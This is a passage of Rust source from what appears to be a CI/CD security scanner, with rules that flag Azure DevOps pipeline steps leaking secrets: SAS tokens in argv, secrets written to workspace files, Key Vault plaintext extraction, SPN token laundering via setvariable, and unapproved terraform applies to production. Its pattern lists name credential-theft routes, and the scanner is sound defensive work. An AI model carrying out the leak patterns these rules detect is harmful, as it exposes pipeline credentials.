1843        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1844            k += 1;
1845        }
1846        if k >= bytes.len() || bytes[k] != b'=' {
1847            i = j;
1848            continue;
1849        }
1850        // Skip `=` and whitespace
1851        k += 1;
1852        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1853            k += 1;
1854        }
1855        // Look at the rest of this logical line (until `\n`).
1856        let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
1857        let rhs = &lower[k..line_end];
1858        if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
1859            // Recover original-case variable name from `body` at the same byte
1860            // offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
1861            // and identifiers in PowerShell are ASCII in the corpus.
1862            let name = body
1863                .get(name_start..j)
1864                .unwrap_or(&lower[name_start..j])
1865                .to_string();
1866            if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
1867                out.push(name);
1868            }
1869        }
1870        i = j;
1871    }
1872    out
1873}
1874
1875/// Rule: pipeline step uses an Azure VM remote-execution primitive
1876/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
1877/// `az vm run-command invoke`, `az vm extension set`) where the executed
1878/// command line is constructed from a pipeline secret or a freshly-minted
1879/// SAS token.
1880///
1881/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
1882/// VM in scope, and the SAS/secret embedded in the command line is logged in
1883/// plaintext on the VM and in the ARM extension status JSON.
1884///
1885/// Detection: read each Step's `META_SCRIPT_BODY`. If the body contains a
1886/// remote-exec tool name AND (it interpolates a known pipeline secret variable
1887/// OR it mints a SAS token in the same body), fire one finding per step.
1888pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
1889    let mut findings = Vec::new();
1890
1891    for step in graph.nodes_of_kind(NodeKind::Step) {
1892        let body = match step.metadata.get(META_SCRIPT_BODY) {
1893            Some(b) if !b.is_empty() => b,
1894            _ => continue,
1895        };
1896        let body_lower = body.to_lowercase();
1897        if !body_uses_vm_remote_exec(&body_lower) {
1898            continue;
1899        }
1900
1901        let secret_names = step_secret_var_names(graph, step.id);
1902        let secret_interpolated = secret_names
1903            .iter()
1904            .any(|name| body_interpolates_var(body, name));
1905        let mints_sas = body_mints_sas(&body_lower);
1906
1907        if !secret_interpolated && !mints_sas {
1908            continue;
1909        }
1910
1911        // Pick a single tool name for the message.
1912        let tool = VM_REMOTE_EXEC_TOKENS
1913            .iter()
1914            .find(|t| body_lower.contains(*t))
1915            .copied()
1916            .unwrap_or("Set-AzVMExtension");
1917
1918        let trigger = if secret_interpolated {
1919            "interpolating a pipeline secret into the executed command line"
1920        } else {
1921            "embedding a freshly-minted SAS token into the executed command line"
1922        };
1923
1924        let mut nodes_involved = vec![step.id];
1925        // Include the secret nodes the step has access to so consumers can
1926        // attribute the finding to the leaked credential.
1927        for edge in graph.edges_from(step.id) {
1928            if edge.kind == EdgeKind::HasAccessTo {
1929                if let Some(n) = graph.node(edge.to) {
1930                    if n.kind == NodeKind::Secret {
1931                        nodes_involved.push(n.id);
1932                    }
1933                }
1934            }
1935        }
1936
1937        findings.push(Finding {
1938            severity: Severity::High,
1939            category: FindingCategory::VmRemoteExecViaPipelineSecret,
1940            path: None,
1941            nodes_involved,
1942            message: format!(
1943                "Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
1944                step.name, tool, trigger
1945            ),
1946            recommendation: Recommendation::Manual {
1947                action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
1948            },
1949            source: FindingSource::BuiltIn,
1950                extras: FindingExtras::default(),
1951});
1952    }
1953
1954    findings
1955}
1956
1957/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
1958/// Conservative — only matches when the LHS contains `<keyword>? IDENT=` and
1959/// nothing after the `=` other than optional opening quote characters.
1960fn matches_bash_assignment(lhs: &str) -> bool {
1961    // `export FOO=`, `declare FOO=`, `local FOO=`, `readonly FOO=`, plain `FOO=`
1962    let after_keyword = strip_one_of(lhs, &["export ", "declare ", "local ", "readonly "])
1963        .unwrap_or(lhs)
1964        .trim_start();
1965    // Allow trailing opening-quote characters between `=` and the secret ref.
1966    let trimmed = after_keyword.trim_end_matches(['"', '\'']);
1967    let Some(ident) = trimmed.strip_suffix('=') else {
1968        return false;
1969    };
1970    !ident.is_empty()
1971        && ident.chars().all(is_shell_var_char)
1972        && !ident.starts_with(|c: char| c.is_ascii_digit())
1973}
1974
/// Heuristic: line prefix looks like a PowerShell assignment.
///
/// `lhs` is the text that precedes a secret reference on a line (the caller
/// passes it with leading whitespace already removed). Two shapes match:
///
///   - `$VAR =`, `$env:VAR =`, `${VAR} =` — the prefix starts with `$` and,
///     once trailing whitespace and opening quotes are removed, ends in `=`;
///   - `Set-Variable ... -Value` — both tokens appear in the prefix.
///
/// PowerShell cmdlet and parameter names are case-insensitive, so the
/// `Set-Variable` / `-Value` check ignores ASCII case (`set-variable -value`
/// is the same command and must match too).
fn matches_powershell_assignment(lhs: &str) -> bool {
    // Strip trailing opening quote and whitespace so `$x = "$(SECRET)` matches.
    let trimmed = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
    if let Some(before_eq) = trimmed.strip_suffix('=') {
        if before_eq.trim_end().starts_with('$') {
            return true;
        }
    }
    // `Set-Variable ... -Value`, in any letter case.
    let lowered = trimmed.to_ascii_lowercase();
    lowered.contains("set-variable") && lowered.contains("-value")
}
1991
/// True for characters allowed in a shell variable name: ASCII letters,
/// ASCII digits and the underscore.
fn is_shell_var_char(c: char) -> bool {
    matches!(c, 'a'..='z' | 'A'..='Z' | '0'..='9' | '_')
}
1995
/// Removes the first entry of `prefixes` that `s` starts with and returns the
/// remainder. Prefixes are tried in slice order; `None` means none matched.
fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
    prefixes.iter().find_map(|prefix| s.strip_prefix(*prefix))
}
2004
2005/// Rule: pipeline secret exported via shell variable inside an inline script.
2006///
2007/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
2008/// log output, but masking happens on the rendered command string before the
2009/// shell runs. Once the value is bound to a shell variable, downstream
2010/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
2011/// `az --debug`) print the cleartext.
2012pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
2013    let mut findings = Vec::new();
2014
2015    for step in graph.nodes_of_kind(NodeKind::Step) {
2016        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2017            continue;
2018        };
2019        if script.is_empty() {
2020            continue;
2021        }
2022        let secrets = step_secret_names(graph, step.id);
2023        let exposed: Vec<String> = secrets
2024            .into_iter()
2025            .filter(|s| script_assigns_secret_to_shell_var(script, s))
2026            .collect();
2027
2028        if exposed.is_empty() {
2029            continue;
2030        }
2031
2032        let n = exposed.len();
2033        let preview: String = exposed
2034            .iter()
2035            .take(3)
2036            .map(|s| format!("$({s})"))
2037            .collect::<Vec<_>>()
2038            .join(", ");
2039        let suffix = if n > 3 {
2040            format!(", and {} more", n - 3)
2041        } else {
2042            String::new()
2043        };
2044        let secret_node_ids: Vec<NodeId> = graph
2045            .edges_from(step.id)
2046            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2047            .filter_map(|e| graph.node(e.to))
2048            .filter(|n| n.kind == NodeKind::Secret && exposed.contains(&n.name))
2049            .map(|n| n.id)
2050            .collect();
2051
2052        let mut nodes_involved = vec![step.id];
2053        nodes_involved.extend(secret_node_ids);
2054
2055        findings.push(Finding {
2056            severity: Severity::High,
2057            category: FindingCategory::SecretToInlineScriptEnvExport,
2058            path: None,
2059            nodes_involved,
2060            message: format!(
2061                "Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
2062                step.name
2063            ),
2064            recommendation: Recommendation::TsafeRemediation {
2065                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
2066                explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
2067            },
2068            source: FindingSource::BuiltIn,
2069                extras: FindingExtras::default(),
2070});
2071    }
2072
2073    findings
2074}
2075
/// How a `resources.repositories[].ref` value resolves. Produced by
/// `classify_repository_ref` and consumed by both repository-ref rules:
/// `template_extends_unpinned_branch` and
/// `template_repo_ref_is_feature_branch`.
enum RepositoryRefClass {
    /// SHA-pinned, tag-pinned — code at the consumer is immutable.
    /// Covers a bare hex SHA, `refs/tags/<non-empty>`, and `refs/heads/<sha>`.
    Pinned,
    /// No `ref:` field (or a blank one) — resolves to the repo's default
    /// branch.
    DefaultBranch,
    /// `refs/heads/<name>` or bare branch — mutable. Carries the branch name
    /// with any `refs/heads/` prefix already removed.
    MutableBranch(String),
}
2086
2087fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
2088    let raw = match ref_value {
2089        None => return RepositoryRefClass::DefaultBranch,
2090        Some(s) if s.trim().is_empty() => return RepositoryRefClass::DefaultBranch,
2091        Some(s) => s.trim(),
2092    };
2093
2094    // Bare 40+ hex SHA — pinned.
2095    if is_hex_sha(raw) {
2096        return RepositoryRefClass::Pinned;
2097    }
2098
2099    // refs/tags/<x> — pinned.
2100    if let Some(tag) = raw.strip_prefix("refs/tags/") {
2101        if !tag.is_empty() {
2102            return RepositoryRefClass::Pinned;
2103        }
2104    }
2105
2106    // refs/heads/<x> — mutable, unless trailing segment is a SHA.
2107    if let Some(branch) = raw.strip_prefix("refs/heads/") {
2108        if is_hex_sha(branch) {
2109            return RepositoryRefClass::Pinned;
2110        }
2111        return RepositoryRefClass::MutableBranch(branch.to_string());
2112    }
2113
2114    // Bare value — treat as a branch name.
2115    RepositoryRefClass::MutableBranch(raw.to_string())
2116}
2117
/// True when `s` is at least 40 bytes long and consists solely of ASCII hex
/// digits (either case) — i.e. it looks like a full commit hash.
fn is_hex_sha(s: &str) -> bool {
    const MIN_SHA_LEN: usize = 40;
    if s.len() < MIN_SHA_LEN {
        return false;
    }
    s.bytes().all(|b| b.is_ascii_hexdigit())
}
2121
2122/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
2123/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
2124/// `-ArgumentList` rather than via env var or stdin.
2125///
2126/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
2127/// ETW process-create events, and ARM extension status — logged for the
2128/// SAS lifetime.
2129///
2130/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
2131/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
2132/// the goal is to catch the corpus pattern, not perfect specificity.
2133pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
2134    let mut findings = Vec::new();
2135
2136    for step in graph.nodes_of_kind(NodeKind::Step) {
2137        let body = match step.metadata.get(META_SCRIPT_BODY) {
2138            Some(b) if !b.is_empty() => b,
2139            _ => continue,
2140        };
2141        let body_lower = body.to_lowercase();
2142
2143        if !body_mints_sas(&body_lower) {
2144            continue;
2145        }
2146        if !body_has_cmdline_sink(&body_lower) {
2147            continue;
2148        }
2149
2150        // Tighten precision: at least one minted-SAS variable must actually
2151        // appear interpolated somewhere in the script body. This filters out
2152        // scripts that mint a SAS purely for upload-to-blob and never put it
2153        // on argv.
2154        let sas_vars = powershell_sas_assignments(body);
2155        let mut interpolated_var: Option<String> = None;
2156        for v in &sas_vars {
2157            if body_interpolates_var(body, v) {
2158                interpolated_var = Some(v.clone());
2159                break;
2160            }
2161        }
2162        // If we couldn't bind a SAS var (e.g. inline `az`-CLI subshell), fall
2163        // back to "mint+sink in same script" — still better than no signal.
2164        let evidence = interpolated_var
2165            .as_deref()
2166            .map(|v| format!("$ {v} interpolated into argv"))
2167            .unwrap_or_else(|| "SAS-mint and command-line sink in same script".to_string());
2168
2169        findings.push(Finding {
2170            severity: Severity::Medium,
2171            category: FindingCategory::ShortLivedSasInCommandLine,
2172            path: None,
2173            nodes_involved: vec![step.id],
2174            message: format!(
2175                "Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
2176                step.name, evidence
2177            ),
2178            recommendation: Recommendation::Manual {
2179                action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
2180            },
2181            source: FindingSource::BuiltIn,
2182                extras: FindingExtras::default(),
2183});
2184    }
2185
2186    findings
2187}
2188
/// Reports whether `line` contains one of the common "write to a file"
/// idioms of bash or PowerShell.
///
/// bash markers are matched case-sensitively on the raw line: redirections
/// (` > `, ` >> `, `>/`, `>>/`), a pipe into `tee`, or a line that begins
/// with `tee `. PowerShell markers (`Out-File`, `Set-Content`, `Add-Content`,
/// `WriteAllText`, `WriteAllLines`) are matched case-insensitively.
fn line_writes_to_file(line: &str) -> bool {
    const SHELL_SINKS: &[&str] = &[" > ", " >> ", ">/", ">>/", "| tee ", "| tee -"];
    const POWERSHELL_SINKS: &[&str] = &[
        "out-file",
        "set-content",
        "add-content",
        "writealltext",
        "writealllines",
    ];

    if line.starts_with("tee ") || SHELL_SINKS.iter().any(|sink| line.contains(*sink)) {
        return true;
    }

    let lowered = line.to_lowercase();
    POWERSHELL_SINKS.iter().any(|sink| lowered.contains(*sink))
}
2216
/// Reports whether `line` mentions an ADO workspace directory macro or a file
/// extension considered risky for secret materialisation.
///
/// Matching is a case-insensitive substring search, so an extension marker
/// such as `.env` also matches inside longer words.
fn line_references_workspace_path(line: &str) -> bool {
    // ADO predefined directory macros, lowercased.
    const WORKSPACE_MACROS: &[&str] = &[
        "$(system.defaultworkingdirectory)",
        "$(build.sourcesdirectory)",
        "$(pipeline.workspace)",
        "$(agent.builddirectory)",
        "$(agent.tempdirectory)",
    ];
    // Common credential / config file extensions.
    const RISKY_EXT: &[&str] = &[
        ".tfvars",
        ".env",
        ".hcl",
        ".pfx",
        ".key",
        ".pem",
        ".crt",
        ".p12",
        ".kubeconfig",
        ".jks",
        ".keystore",
    ];

    let haystack = line.to_lowercase();
    WORKSPACE_MACROS
        .iter()
        .chain(RISKY_EXT.iter())
        .any(|marker| haystack.contains(*marker))
}
2245
2246/// Heuristic: returns true if `script` materialises `secret` to a workspace
2247/// file. Looks for a single line that contains the secret reference AND a
2248/// "write to file" sink AND a workspace/credfile path target.
2249///
2250/// Also detects the heredoc + Out-File pattern across multiple lines:
2251/// the secret appears inside a `@" ... "@` block whose final pipe is
2252/// `Out-File <workspace-path>`.
2253fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
2254    let needle = format!("$({secret})");
2255
2256    // Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
2257    // `Out-File ... $(SECRET) ...`, etc.
2258    for line in script.lines() {
2259        if line.contains(&needle)
2260            && line_writes_to_file(line)
2261            && line_references_workspace_path(line)
2262        {
2263            return true;
2264        }
2265    }
2266
2267    // Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
2268    // being piped into Out-File / Set-Content with a workspace path. We
2269    // detect this conservatively: if any line assigns `$x = "$(SECRET)"`
2270    // AND any *later* line both writes-to-file and references a workspace
2271    // path, we flag it. False-positive risk is low because the ASLR-style
2272    // `$x` typically won't be reused for unrelated content within the same
2273    // inline block.
2274    let mut secret_bound_to_var = false;
2275    for line in script.lines() {
2276        let trimmed = line.trim();
2277        if !secret_bound_to_var
2278            && trimmed.contains(&needle)
2279            && trimmed.starts_with('$')
2280            && trimmed.contains('=')
2281        {
2282            secret_bound_to_var = true;
2283            continue;
2284        }
2285        if secret_bound_to_var && line_writes_to_file(line) && line_references_workspace_path(line)
2286        {
2287            return true;
2288        }
2289    }
2290
2291    false
2292}
2293
2294/// Rule: pipeline secret materialised to a file under the agent workspace.
2295///
2296/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
2297/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
2298/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
2299/// remain readable by every subsequent step in the same job.
2300pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
2301    let mut findings = Vec::new();
2302
2303    for step in graph.nodes_of_kind(NodeKind::Step) {
2304        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2305            continue;
2306        };
2307        if script.is_empty() {
2308            continue;
2309        }
2310        let secrets = step_secret_names(graph, step.id);
2311        let materialised: Vec<String> = secrets
2312            .into_iter()
2313            .filter(|s| script_materialises_secret_to_file(script, s))
2314            .collect();
2315
2316        if materialised.is_empty() {
2317            continue;
2318        }
2319
2320        let n = materialised.len();
2321        let preview: String = materialised
2322            .iter()
2323            .take(3)
2324            .map(|s| format!("$({s})"))
2325            .collect::<Vec<_>>()
2326            .join(", ");
2327        let suffix = if n > 3 {
2328            format!(", and {} more", n - 3)
2329        } else {
2330            String::new()
2331        };
2332
2333        let secret_node_ids: Vec<NodeId> = graph
2334            .edges_from(step.id)
2335            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2336            .filter_map(|e| graph.node(e.to))
2337            .filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
2338            .map(|n| n.id)
2339            .collect();
2340
2341        let mut nodes_involved = vec![step.id];
2342        nodes_involved.extend(secret_node_ids);
2343
2344        findings.push(Finding {
2345            severity: Severity::High,
2346            category: FindingCategory::SecretMaterialisedToWorkspaceFile,
2347            path: None,
2348            nodes_involved,
2349            message: format!(
2350                "Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
2351                step.name
2352            ),
2353            recommendation: Recommendation::Manual {
2354                action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
2355            },
2356            source: FindingSource::BuiltIn,
2357                extras: FindingExtras::default(),
2358});
2359    }
2360
2361    findings
2362}
2363
/// Reports whether `script` contains a Key Vault → plaintext extraction
/// pattern that lands the secret in a non-`SecureString` variable.
///
/// The check is case-insensitive and looks at the script as a whole: the two
/// halves of a pattern need not sit on the same line. Recognised pairs:
///
/// * `Get-AzKeyVaultSecret` with `-AsPlainText` (new syntax),
/// * `Get-AzKeyVaultSecret` with `.SecretValueText` (old syntax),
/// * `Get-AzKeyVaultSecret` with `PtrToStringAuto` (BSTR conversion),
/// * `ConvertFrom-SecureString` with `-AsPlainText` (PS 7+).
fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
    let lower = script.to_lowercase();
    let mentions = |marker: &str| lower.contains(marker);

    let as_plain_text = mentions("-asplaintext");
    if mentions("get-azkeyvaultsecret") {
        // Any of the three plaintext routes out of a Key Vault fetch.
        as_plain_text || mentions(".secretvaluetext") || mentions("ptrtostringauto")
    } else {
        // No Key Vault cmdlet: only the flat SecureString → plaintext form.
        mentions("convertfrom-securestring") && as_plain_text
    }
}
2386
2387/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
2388/// script. The value never crosses the ADO variable-group boundary so
2389/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
2390/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
2391/// traces) will print the cleartext credential.
2392///
2393/// Severity: Medium. Lower than the materialisation rules because the value
2394/// is at least kept in process memory (vs. on disk), but still a real
2395/// exposure path that pipeline-level secret rotation alone does not fix.
2396pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
2397    let mut findings = Vec::new();
2398
2399    for step in graph.nodes_of_kind(NodeKind::Step) {
2400        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2401            continue;
2402        };
2403        if script.is_empty() {
2404            continue;
2405        }
2406        if !script_extracts_keyvault_to_plaintext(script) {
2407            continue;
2408        }
2409
2410        findings.push(Finding {
2411            severity: Severity::Medium,
2412            category: FindingCategory::KeyVaultSecretToPlaintext,
2413            path: None,
2414            nodes_involved: vec![step.id],
2415            message: format!(
2416                "Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
2417                step.name
2418            ),
2419            recommendation: Recommendation::Manual {
2420                action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
2421            },
2422            source: FindingSource::BuiltIn,
2423                extras: FindingExtras::default(),
2424});
2425    }
2426
2427    findings
2428}
2429
/// Returns true when `name` (case-insensitive) looks like a production
/// service-connection name.
///
/// The name is split into segments on `-` and `_`; it matches when any
/// segment is exactly `prod`, `production` or `prd`. That covers the whole
/// name (`prod`), leading / trailing segments (`prod-foo`, `foo-prd`), inner
/// segments (`app-prod-eu`) and mixed separators (`app-prod_eu`).
///
/// Conservative: only whole segments count, so substrings such as
/// "approver", "reproduce" or "preprod" do not match.
fn looks_like_prod_connection(name: &str) -> bool {
    const PROD_TOKENS: [&str; 3] = ["prod", "production", "prd"];

    let lower = name.to_lowercase();
    lower
        .split(|c: char| c == '-' || c == '_')
        .any(|segment| PROD_TOKENS.contains(&segment))
}
2448
/// Returns true when an inline script body looks like it is laundering
/// federated SPN/OIDC token material into a pipeline variable via
/// `##vso[task.setvariable]`. Used to escalate addspn_with_inline_script's
/// message wording when explicit laundering is detected.
///
/// Both conditions are evaluated case-insensitively against the whole body:
/// the script must contain a `##vso[task.setvariable` directive AND mention
/// at least one well-known token marker. The two are not required to be on
/// the same line.
fn script_launders_spn_token(s: &str) -> bool {
    const TOKEN_MARKERS: [&str; 8] = [
        "$env:idtoken",
        "$env:serviceprincipalkey",
        "$env:serviceprincipalid",
        "$env:tenantid",
        "arm_oidc_token",
        "arm_client_id",
        "arm_client_secret",
        "arm_tenant_id",
    ];

    let lower = s.to_lowercase();
    lower.contains("##vso[task.setvariable")
        && TOKEN_MARKERS.iter().any(|marker| lower.contains(*marker))
}
2470
2471/// Rule: `terraform apply -auto-approve` against a production service
2472/// connection without an environment approval gate.
2473///
2474/// Combines three signals on a Step node:
2475///   1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
2476///      inline script runs `terraform apply --auto-approve`, or a
2477///      `TerraformCLI@N` task has `command: apply` + commandOptions
2478///      containing `auto-approve`).
2479///   2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
2480///      (`prod`, `production`, `prd`), OR the step is linked via
2481///      `HasAccessTo` to an Identity service-connection node whose name
2482///      matches that pattern.
2483///   3. The step is NOT inside an `environment:`-bound deployment job
2484///      (parser sets `META_ENV_APPROVAL` for those steps).
2485///
2486/// Severity: Critical. Bypasses the only ADO-side change-control on
2487/// infra rewrites.
2488pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
2489    let mut findings = Vec::new();
2490
2491    for step in graph.nodes_of_kind(NodeKind::Step) {
2492        let auto_approve = step
2493            .metadata
2494            .get(META_TERRAFORM_AUTO_APPROVE)
2495            .map(|v| v == "true")
2496            .unwrap_or(false);
2497        if !auto_approve {
2498            continue;
2499        }
2500
2501        // Step's own service-connection name (set by parser from
2502        // azureSubscription / connectedServiceName / etc).
2503        let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
2504
2505        // Walk HasAccessTo edges to find a service-connection Identity. This
2506        // catches steps that don't carry the name on themselves but inherit
2507        // an Identity node via the parser's edge.
2508        let edge_conn = graph
2509            .edges_from(step.id)
2510            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2511            .filter_map(|e| graph.node(e.to))
2512            .find(|n| {
2513                n.kind == NodeKind::Identity
2514                    && n.metadata
2515                        .get(META_SERVICE_CONNECTION)
2516                        .map(|v| v == "true")
2517                        .unwrap_or(false)
2518            })
2519            .map(|n| n.name.clone());
2520
2521        let conn_name = match direct_conn.or(edge_conn) {
2522            Some(n) if looks_like_prod_connection(&n) => n,
2523            _ => continue,
2524        };
2525
2526        // Compensating control: an `environment:` binding routes the apply
2527        // through ADO's approval / check pipeline. Whether that environment
2528        // *actually* has approvers configured is invisible from YAML — so
2529        // downgrade Critical → Medium instead of skipping outright (the
2530        // previous behaviour silently dropped the finding even when the
2531        // environment was a CI-only approval-free passthrough).
2532        let env_gated = step
2533            .metadata
2534            .get(META_ENV_APPROVAL)
2535            .map(|v| v == "true")
2536            .unwrap_or(false);
2537        let (severity, suffix) = if env_gated {
2538            (
2539                Severity::Medium,
2540                " — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
2541            )
2542        } else {
2543            (
2544                Severity::Critical,
2545                " — any committer can rewrite prod infrastructure",
2546            )
2547        };
2548
2549        findings.push(Finding {
2550            severity,
2551            category: FindingCategory::TerraformAutoApproveInProd,
2552            path: None,
2553            nodes_involved: vec![step.id],
2554            message: format!(
2555                "Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
2556                step.name, conn_name, suffix
2557            ),
2558            recommendation: Recommendation::Manual {
2559                action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
2560            },
2561            source: FindingSource::BuiltIn,
2562                extras: FindingExtras::default(),
2563});
2564    }
2565
2566    findings
2567}
2568
2569/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
2570/// script body. The inline script can launder federated SPN material
2571/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
2572/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
2573/// downstream tasks/artifacts un-masked.
2574///
2575/// Severity: High. Escalates message wording when the script body contains
2576/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
2577/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
2578pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
2579    let mut findings = Vec::new();
2580
2581    for step in graph.nodes_of_kind(NodeKind::Step) {
2582        let add_spn = step
2583            .metadata
2584            .get(META_ADD_SPN_TO_ENV)
2585            .map(|v| v == "true")
2586            .unwrap_or(false);
2587        if !add_spn {
2588            continue;
2589        }
2590
2591        let body = match step.metadata.get(META_SCRIPT_BODY) {
2592            Some(b) if !b.trim().is_empty() => b,
2593            _ => continue,
2594        };
2595
2596        let launders = script_launders_spn_token(body);
2597        let suffix = if launders {
2598            " — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
2599        } else {
2600            ""
2601        };
2602
2603        findings.push(Finding {
2604            severity: Severity::High,
2605            category: FindingCategory::AddSpnWithInlineScript,
2606            path: None,
2607            nodes_involved: vec![step.id],
2608            message: format!(
2609                "Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
2610                step.name, suffix
2611            ),
2612            recommendation: Recommendation::Manual {
2613                action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
2614            },
2615            source: FindingSource::BuiltIn,
2616                extras: FindingExtras::default(),
2617});
2618    }
2619
2620    findings
2621}
2622
2623/// Rule: free-form `type: string` parameter (no `values:` allowlist)
2624/// interpolated via `${{ parameters.<name> }}` directly into an inline
2625/// shell/PowerShell script body. ADO does not escape parameter values in
2626/// YAML emission, so any user with "queue build" can inject shell.
2627///
2628/// Detection requires the parser to populate
2629/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
2630/// nodes with `META_SCRIPT_BODY`.
2631///
2632/// Severity: Medium.
2633pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
2634    if graph.parameters.is_empty() {
2635        return Vec::new();
2636    }
2637
2638    // Free-form string parameters: type is `string` (or unspecified — ADO's
2639    // default) AND no `values:` allowlist.
2640    let free_form: Vec<&str> = graph
2641        .parameters
2642        .iter()
2643        .filter(|(_, spec)| {
2644            !spec.has_values_allowlist
2645                && (spec.param_type.is_empty() || spec.param_type.eq_ignore_ascii_case("string"))
2646        })
2647        .map(|(name, _)| name.as_str())
2648        .collect();
2649
2650    if free_form.is_empty() {
2651        return Vec::new();
2652    }
2653
2654    let mut findings = Vec::new();
2655
2656    for step in graph.nodes_of_kind(NodeKind::Step) {
2657        let body = match step.metadata.get(META_SCRIPT_BODY) {
2658            Some(b) if !b.is_empty() => b,
2659            _ => continue,
2660        };
2661
2662        // Find every free-form parameter that appears interpolated in the
2663        // script body. Match both `${{ parameters.X }}` and `${{parameters.X}}`.
2664        let mut hits: Vec<&str> = Vec::new();
2665        for &name in &free_form {
2666            let needle_a = format!("${{{{ parameters.{name} }}}}");
2667            let needle_b = format!("${{{{parameters.{name}}}}}");
2668            if body.contains(&needle_a) || body.contains(&needle_b) {
2669                hits.push(name);
2670            }
2671        }
2672
2673        if hits.is_empty() {
2674            continue;
2675        }
2676
2677        hits.sort();
2678        hits.dedup();
2679        let names = hits.join(", ");
2680
2681        findings.push(Finding {
